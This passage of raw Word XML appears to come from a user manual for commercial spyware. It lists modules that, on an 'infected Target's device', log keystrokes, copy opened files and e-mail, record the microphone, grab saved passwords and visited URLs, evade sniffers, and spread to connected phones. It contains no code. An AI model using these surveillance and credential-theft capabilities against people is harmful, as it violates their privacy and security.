              <w:t xml:space="preserve">odule records </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">information and/or an exact copy of </w:t>
            </w:r>
            <w:r w:rsidRPr="00095D52">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">all files opened on the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>infected Target’s device.</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E7386" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1058" type="#_x0000_t75" style="width:33pt;height:33pt" o:ole="">
                  <v:imagedata r:id="rId158" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1058" DrawAspect="Content" ObjectID="_1446455273" r:id="rId159"/>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Keylog</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0023442F" w:rsidRPr="00671455" w:rsidRDefault="00057E0C" w:rsidP="00B97BB7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00057E0C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Keylog </w:t>
            </w:r>
            <w:r w:rsidR="00B97BB7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00057E0C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule records all keystrokes on the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>infected Target’s device.</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E7386" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1059" type="#_x0000_t75" style="width:33pt;height:33pt" o:ole="">
                  <v:imagedata r:id="rId160" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1059" DrawAspect="Content" ObjectID="_1446455274" r:id="rId161"/>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Messages</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B97BB7" w:rsidRPr="00671455" w:rsidRDefault="00B97BB7" w:rsidP="00B97BB7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B97BB7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Messages </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00B97BB7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule records all </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">e-mail </w:t>
            </w:r>
            <w:r w:rsidRPr="00B97BB7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">messages received and sent by the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>infected T</w:t>
            </w:r>
            <w:r w:rsidRPr="00B97BB7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>arget</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>’s device.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0023442F" w:rsidRPr="00671455" w:rsidRDefault="0023442F" w:rsidP="00B97BB7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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B26D7B" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1060" type="#_x0000_t75" style="width:33pt;height:33pt" o:ole="">
                  <v:imagedata r:id="rId162" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1060" DrawAspect="Content" ObjectID="_1446455275" r:id="rId163"/>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Mic</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0023442F" w:rsidRPr="00671455" w:rsidRDefault="00351996" w:rsidP="00351996">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00351996">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Mic </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00351996">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule records the surroundings audio using the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s </w:t>
            </w:r>
            <w:r w:rsidRPr="00351996">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>device</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00351996">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>microphone</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</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DD03C9" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1061" type="#_x0000_t75" style="width:33pt;height:33pt" o:ole="">
                  <v:imagedata r:id="rId164" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1061" DrawAspect="Content" ObjectID="_1446455276" r:id="rId165"/>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Mouse</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0023442F" w:rsidRPr="00671455" w:rsidRDefault="00D17789" w:rsidP="00D17789">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D17789">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Mouse </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00D17789">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule captures </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>as</w:t>
            </w:r>
            <w:r w:rsidRPr="00D17789">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> image a small area of the s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">creen around the mouse pointer, </w:t>
            </w:r>
            <w:r w:rsidR="00B763A7">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>upon each click from the infec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ted Target’s device.</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83795A" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1062" type="#_x0000_t75" style="width:33pt;height:33pt" o:ole="">
                  <v:imagedata r:id="rId166" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1062" DrawAspect="Content" ObjectID="_1446455277" r:id="rId167"/>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Password</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0023442F" w:rsidRPr="00671455" w:rsidRDefault="00542AC2" w:rsidP="005B49B3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00542AC2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Password </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00542AC2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule logs all passwords saved </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">inside infected Target’s device applications (e.g. </w:t>
            </w:r>
            <w:r w:rsidRPr="00542AC2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>browser</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00542AC2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:r w:rsidRPr="00542AC2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">nstant </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>m</w:t>
            </w:r>
            <w:r w:rsidRPr="00542AC2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">essenger and web-mail </w:t>
            </w:r>
            <w:r w:rsidR="005B49B3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>services)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</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290AFC" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1063" type="#_x0000_t75" style="width:33pt;height:33pt" o:ole="">
                  <v:imagedata r:id="rId168" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1063" DrawAspect="Content" ObjectID="_1446455278" r:id="rId169"/>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Url</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0023442F" w:rsidRPr="00671455" w:rsidRDefault="0096445E" w:rsidP="00626DD9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0096445E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Url </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidR="00626DD9">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule records the </w:t>
            </w:r>
            <w:r w:rsidRPr="0096445E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">websites </w:t>
            </w:r>
            <w:r w:rsidR="00626DD9">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">addresses </w:t>
            </w:r>
            <w:r w:rsidRPr="0096445E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">visited by the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s device </w:t>
            </w:r>
            <w:r w:rsidRPr="0096445E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>browser</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>s.</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290AFC" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1064" type="#_x0000_t75" style="width:33pt;height:33pt" o:ole="">
                  <v:imagedata r:id="rId170" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1064" DrawAspect="Content" ObjectID="_1446455279" r:id="rId171"/>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Crisis</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0023442F" w:rsidRPr="00671455" w:rsidRDefault="00C16B3C" w:rsidP="001F0B7A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C16B3C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Crisis </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00C16B3C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>odule recognizes dangerous</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C16B3C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">situations on the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>infected Target’s device</w:t>
            </w:r>
            <w:r w:rsidR="00BD0583">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C16B3C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">that may disclose the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00C16B3C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>gent’s presence on the device (</w:t>
            </w:r>
            <w:r w:rsidR="00BD0583">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">e.g. a network </w:t>
            </w:r>
            <w:r w:rsidRPr="00C16B3C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sniffer)</w:t>
            </w:r>
            <w:r w:rsidR="00BD0583">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="00C16B3C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Synchronization and </w:t>
            </w:r>
            <w:r w:rsidR="00BD0583">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">other </w:t>
            </w:r>
            <w:r w:rsidRPr="00C16B3C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>comma</w:t>
            </w:r>
            <w:r w:rsidR="00BD0583">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>nds can be temporarily disabled.</w:t>
            </w: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RPr="005701FD" w:rsidTr="0023442F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0023442F" w:rsidRPr="005701FD" w:rsidRDefault="0023442F" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="238" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0023442F" w:rsidRPr="005701FD" w:rsidRDefault="0023442F" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0023442F" w:rsidRPr="005701FD" w:rsidRDefault="0023442F" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0023442F" w:rsidRPr="006172B5" w:rsidTr="0023442F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0023442F" w:rsidRPr="006172B5" w:rsidRDefault="0023442F" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="238" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0023442F" w:rsidRPr="006172B5" w:rsidRDefault="0023442F" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0023442F" w:rsidRPr="006172B5" w:rsidRDefault="0023442F" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0023442F" w:rsidTr="0023442F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0023442F" w:rsidRDefault="00290AFC" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1065" type="#_x0000_t75" style="width:33pt;height:33pt" o:ole="">
                  <v:imagedata r:id="rId172" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1065" DrawAspect="Content" ObjectID="_1446455280" r:id="rId173"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="238" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0023442F" w:rsidRDefault="0023442F" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0023442F" w:rsidRPr="00671455" w:rsidRDefault="0023442F" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Infection</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0023442F" w:rsidRPr="00671455" w:rsidRDefault="00F80A49" w:rsidP="00574703">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F80A49">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The Infection Module allows</w:t>
            </w:r>
            <w:r w:rsidR="00FB5F57">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00574703">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>to infect a mobile phone connected to a previously infected desktop.</w:t>
            </w:r>
            <w:r w:rsidR="00FB5F57">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001F0B7A" w:rsidRDefault="001F0B7A" w:rsidP="006618FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001F0B7A" w:rsidRDefault="001F0B7A">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006618FF" w:rsidRPr="00EF348A" w:rsidRDefault="00EF348A" w:rsidP="006618FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF348A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Some Module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF348A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow to specify additional parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B65160" w:rsidRDefault="00B65160" w:rsidP="00B65160">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF348A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The images below show the pop-up windows for the </w:t>
      </w:r>
      <w:r w:rsidR="00EF348A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF348A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF348A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Modules that present additional parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF348A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7">
